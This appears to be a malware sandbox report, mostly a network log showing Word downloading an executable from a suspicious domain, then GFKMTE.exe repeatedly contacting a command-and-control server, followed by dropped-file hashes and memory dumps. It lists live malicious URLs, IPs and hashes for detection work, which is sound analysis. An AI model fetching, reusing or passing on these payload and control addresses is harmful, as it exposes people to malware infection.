      GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 271273
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
      Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
      ETag: 0x8D60DDB967B9FA5
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: dacba5b7-401e-0105-2397-a08a43000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-us
      DNS
      217.26.123.92.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.26.123.92.in-addr.arpa
      IN PTR
      Response
      217.26.123.92.in-addr.arpa
      IN PTR
      a92-123-26-217deploystaticakamaitechnologiescom
    • flag-us
      DNS
      136.252.19.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      136.252.19.2.in-addr.arpa
      IN PTR
      Response
      136.252.19.2.in-addr.arpa
      IN PTR
      a2-19-252-136deploystaticakamaitechnologiescom
    • flag-us
      DNS
      dns.stipamana.com
      GFKMTE.exe
      Remote address:
      8.8.8.8:53
      Request
      dns.stipamana.com
      IN A
      Response
      dns.stipamana.com
      IN A
      87.120.121.160
    • flag-us
      DNS
      154.239.44.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      154.239.44.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      56.163.245.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.163.245.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      15.164.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.164.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      180.129.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      180.129.81.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      85.49.80.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      85.49.80.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      3.17.178.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      3.17.178.52.in-addr.arpa
      IN PTR
      Response
    • 52.109.89.19:443
      https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
      tls, http
      WINWORD.EXE
      1.8kB
      8.2kB
      12
      11

      HTTP Request

      POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

      HTTP Response

      200
    • 94.156.167.57:443
      https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe
      tls, http
      WINWORD.EXE
      7.5kB
      187.8kB
      147
      142

      HTTP Request

      GET https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe

      HTTP Response

      200
    • 88.221.134.115:80
      http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgP9IoBvxPBYG5AD8lLDTzup%2FQ%3D%3D
      http
      WINWORD.EXE
      518 B
      1.1kB
      6
      4

      HTTP Request

      GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgP9IoBvxPBYG5AD8lLDTzup%2FQ%3D%3D

      HTTP Response

      200
    • 92.123.26.217:443
      https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
      tls, http
      WINWORD.EXE
      1.3kB
      6.0kB
      10
      11

      HTTP Request

      GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
      tls, http
      WINWORD.EXE
      9.9kB
      256.8kB
      152
      191

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
      tls, http
      WINWORD.EXE
      75.8kB
      2.7MB
      1353
      1914

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
      tls, http
      WINWORD.EXE
      27.8kB
      712.0kB
      458
      518

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
      tls, http
      WINWORD.EXE
      4.0kB
      87.4kB
      57
      71

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
      tls, http
      WINWORD.EXE
      35.7kB
      1.1MB
      607
      826

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
      tls, http
      WINWORD.EXE
      27.4kB
      606.9kB
      399
      442

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
      tls, http
      WINWORD.EXE
      36.0kB
      759.1kB
      508
      551

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
      tls, http
      WINWORD.EXE
      116.6kB
      3.6MB
      1941
      2561

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
      tls, http
      WINWORD.EXE
      50.6kB
      1.2MB
      746
      849

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
      tls, http
      WINWORD.EXE
      13.2kB
      273.9kB
      186
      203

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
      tls, http
      WINWORD.EXE
      68.0kB
      1.9MB
      1100
      1342

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
      tls, http
      WINWORD.EXE
      1.7kB
      37.1kB
      21
      33

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
      tls, http
      WINWORD.EXE
      1.7kB
      37.0kB
      21
      33

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
      tls, http
      WINWORD.EXE
      52.6kB
      1.4MB
      795
      1006

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
      tls, http
      WINWORD.EXE
      10.7kB
      322.2kB
      169
      237

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
      tls, http
      WINWORD.EXE
      1.8kB
      41.7kB
      23
      36

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
      tls, http
      WINWORD.EXE
      32.0kB
      751.6kB
      473
      545

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
      tls, http
      WINWORD.EXE
      1.6kB
      27.8kB
      18
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
      tls, http
      WINWORD.EXE
      51.1kB
      2.0MB
      930
      1417

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
      tls, http
      WINWORD.EXE
      1.7kB
      37.1kB
      21
      33

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab
      tls, http
      WINWORD.EXE
      1.7kB
      32.9kB
      20
      30

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab
      tls, http
      WINWORD.EXE
      1.6kB
      27.9kB
      18
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
      tls, http
      WINWORD.EXE
      100.5kB
      3.4MB
      1701
      2438

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab
      tls, http
      WINWORD.EXE
      1.6kB
      26.3kB
      17
      25

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
      tls, http
      WINWORD.EXE
      46.0kB
      1.0MB
      674
      733

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
      tls, http
      WINWORD.EXE
      1.6kB
      27.6kB
      18
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
      tls, http
      WINWORD.EXE
      1.6kB
      25.6kB
      17
      25

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
      tls, http
      WINWORD.EXE
      1.6kB
      27.0kB
      19
      27

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
      tls, http
      WINWORD.EXE
      2.1kB
      31.2kB
      26
      29

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
      tls, http
      WINWORD.EXE
      1.7kB
      28.5kB
      20
      27

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
      tls, http
      WINWORD.EXE
      1.6kB
      28.1kB
      18
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
      tls, http
      WINWORD.EXE
      1.8kB
      27.1kB
      21
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
      tls, http
      WINWORD.EXE
      1.7kB
      25.0kB
      19
      24

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
      tls, http
      WINWORD.EXE
      10.9kB
      290.9kB
      164
      215

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
      tls, http
      WINWORD.EXE
      11.8kB
      310.3kB
      183
      228

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
      tls, http
      WINWORD.EXE
      51.2kB
      2.7MB
      1027
      1926

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
      tls, http
      WINWORD.EXE
      13.7kB
      278.5kB
      185
      206

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
      tls, http
      WINWORD.EXE
      12.2kB
      286.4kB
      191
      210

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

      HTTP Response

      200
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      160 B
      5
      4
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      134.130.81.91.in-addr.arpa
      dns
      72 B
      147 B
      1
      1

      DNS Request

      134.130.81.91.in-addr.arpa

    • 8.8.8.8:53
      roaming.officeapps.live.com
      dns
      WINWORD.EXE
      73 B
      247 B
      1
      1

      DNS Request

      roaming.officeapps.live.com

      DNS Response

      52.109.89.19

    • 8.8.8.8:53
      www.stipamana.com
      dns
      WINWORD.EXE
      63 B
      79 B
      1
      1

      DNS Request

      www.stipamana.com

      DNS Response

      94.156.167.57

    • 8.8.8.8:53
      r10.o.lencr.org
      dns
      WINWORD.EXE
      61 B
      272 B
      1
      1

      DNS Request

      r10.o.lencr.org

      DNS Response

      88.221.134.115
      88.221.134.137
      88.221.135.106
      88.221.135.115
      88.221.134.89
      88.221.135.107
      88.221.134.107
      88.221.135.105
      88.221.134.91

    • 8.8.8.8:53
      18.89.109.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      18.89.109.52.in-addr.arpa

    • 8.8.8.8:53
      30.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      30.243.111.52.in-addr.arpa

    • 8.8.8.8:53
      19.89.109.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      19.89.109.52.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      76.32.126.40.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      76.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      57.167.156.94.in-addr.arpa
      dns
      72 B
      132 B
      1
      1

      DNS Request

      57.167.156.94.in-addr.arpa

    • 8.8.8.8:53
      168.245.100.95.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      168.245.100.95.in-addr.arpa

    • 8.8.8.8:53
      115.134.221.88.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      115.134.221.88.in-addr.arpa

    • 8.8.8.8:53
      217.106.137.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      217.106.137.52.in-addr.arpa

    • 8.8.8.8:53
      17.173.189.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      17.173.189.20.in-addr.arpa

    • 8.8.8.8:53
      metadata.templates.cdn.office.net
      dns
      WINWORD.EXE
      79 B
      231 B
      1
      1

      DNS Request

      metadata.templates.cdn.office.net

      DNS Response

      92.123.26.217
      92.123.26.202

    • 8.8.8.8:53
      28.118.140.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      28.118.140.52.in-addr.arpa

    • 8.8.8.8:53
      binaries.templates.cdn.office.net
      dns
      WINWORD.EXE
      79 B
      202 B
      1
      1

      DNS Request

      binaries.templates.cdn.office.net

      DNS Response

      2.19.252.136
      2.19.252.143

    • 8.8.8.8:53
      217.26.123.92.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      217.26.123.92.in-addr.arpa

    • 8.8.8.8:53
      136.252.19.2.in-addr.arpa
      dns
      71 B
      135 B
      1
      1

      DNS Request

      136.252.19.2.in-addr.arpa

    • 8.8.8.8:53
      dns.stipamana.com
      dns
      GFKMTE.exe
      63 B
      79 B
      1
      1

      DNS Request

      dns.stipamana.com

      DNS Response

      87.120.121.160

    • 8.8.8.8:53
      154.239.44.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      154.239.44.20.in-addr.arpa

    • 8.8.8.8:53
      56.163.245.4.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      56.163.245.4.in-addr.arpa

    • 8.8.8.8:53
      15.164.165.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      15.164.165.52.in-addr.arpa

    • 8.8.8.8:53
      180.129.81.91.in-addr.arpa
      dns
      72 B
      147 B
      1
      1

      DNS Request

      180.129.81.91.in-addr.arpa

    • 8.8.8.8:53
      85.49.80.91.in-addr.arpa
      dns
      70 B
      145 B
      1
      1

      DNS Request

      85.49.80.91.in-addr.arpa

    • 8.8.8.8:53
      3.17.178.52.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      3.17.178.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GFKMTE.exe.log

      Filesize

      706B

      MD5

      d95c58e609838928f0f49837cab7dfd2

      SHA1

      55e7139a1e3899195b92ed8771d1ca2c7d53c916

      SHA256

      0407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339

      SHA512

      405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d

    • C:\Users\Admin\AppData\Local\Temp\tmpAA59.tmp

      Filesize

      1KB

      MD5

      dabe93a03c5560ab1670cf79b8d28566

      SHA1

      69738fe43d4550ece028ff2795a54bbad0985414

      SHA256

      743e8b28a38e98ea27ef07f17b7529976979c7b01eab92586a6cb686c0d1f68d

      SHA512

      15b3b49c46901e00a73def834225df28fd843af1e9ae594c7d061406209f6ce57277673c9c1ae3ed541f989fa499fd3e88929e00ebded6d23301f8d3680a6c57

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl

      Filesize

      245KB

      MD5

      f883b260a8d67082ea895c14bf56dd56

      SHA1

      7954565c1f243d46ad3b1e2f1baf3281451fc14b

      SHA256

      ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

      SHA512

      d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      16B

      MD5

      d29962abc88624befc0135579ae485ec

      SHA1

      e40a6458296ec6a2427bcb280572d023a9862b31

      SHA256

      a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

      SHA512

      4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe

      Filesize

      173KB

      MD5

      94a7e3859c2e4238421cdfe73d49603c

      SHA1

      03f03c5b5d8cf362aa52b9e793e7be398d779c21

      SHA256

      639135eb69333aba7ecb762072d8bef1d2db83e54edbe627dd223039142b8c91

      SHA512

      74048463606f7017bd8bd3c92773edde5a406247c5ea437b8ee580a3d9e65eb755aa44de466fc2aabef8b9a67c40163afeb3df9bc9fb35f8afe20814d5de85b5

    • memory/216-123-0x0000000002E40000-0x0000000002E74000-memory.dmp

      Filesize

      208KB

    • memory/544-98-0x0000000000400000-0x0000000000412000-memory.dmp

      Filesize

      72KB

    • memory/4400-97-0x0000000005760000-0x0000000005766000-memory.dmp

      Filesize

      24KB

    • memory/4400-96-0x0000000007DD0000-0x0000000007E62000-memory.dmp

      Filesize

      584KB

    • memory/4400-95-0x0000000008380000-0x0000000008924000-memory.dmp

      Filesize

      5.6MB

    • memory/4400-94-0x0000000007D30000-0x0000000007DCC000-memory.dmp

      Filesize

      624KB

    • memory/4400-93-0x0000000003190000-0x00000000031C4000-memory.dmp

      Filesize

      208KB

    • memory/4400-92-0x0000000003230000-0x0000000003236000-memory.dmp

      Filesize

      24KB

    • memory/4400-91-0x0000000000DF0000-0x0000000000E20000-memory.dmp

      Filesize

      192KB

    • memory/5076-16-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-12-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-8-0x00007FF8DAA90000-0x00007FF8DAAA0000-memory.dmp

      Filesize

      64KB

    • memory/5076-17-0x00007FF8D8710000-0x00007FF8D8720000-memory.dmp

      Filesize

      64KB

    • memory/5076-18-0x00007FF8D8710000-0x00007FF8D8720000-memory.dmp

      Filesize

      64KB

    • memory/5076-43-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-54-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-10-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-11-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-13-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-14-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-1-0x00007FF91AAAD000-0x00007FF91AAAE000-memory.dmp

      Filesize

      4KB

    • memory/5076-15-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-9-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-7-0x00007FF8DAA90000-0x00007FF8DAAA0000-memory.dmp

      Filesize

      64KB

    • memory/5076-6-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-5-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-4-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-2-0x00007FF8DAA90000-0x00007FF8DAAA0000-memory.dmp

      Filesize

      64KB

    • memory/5076-130-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-132-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-131-0x00007FF91AAAD000-0x00007FF91AAAE000-memory.dmp

      Filesize

      4KB

    • memory/5076-133-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-136-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-140-0x00007FF91AA10000-0x00007FF91AC05000-memory.dmp

      Filesize

      2.0MB

    • memory/5076-3-0x00007FF8DAA90000-0x00007FF8DAAA0000-memory.dmp

      Filesize

      64KB

    • memory/5076-0-0x00007FF8DAA90000-0x00007FF8DAAA0000-memory.dmp

      Filesize

      64KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.